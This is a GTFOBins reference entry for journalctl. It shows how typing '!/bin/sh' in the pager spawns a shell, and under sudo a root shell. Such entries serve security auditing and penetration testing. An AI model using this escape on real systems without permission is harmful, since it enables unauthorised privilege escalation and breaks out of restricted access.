GTFOBins.github.io/_gtfobins/journalctl.md
2018-10-02 18:40:06 +02:00

13 lines
279 B
Markdown

---
functions:
execute-interactive:
- description: This might not work if run by unprivileged users depending on the system configuration.
code: |
journalctl --system
!/bin/sh
sudo-enabled:
- code: |
sudo journalctl
!/bin/sh
---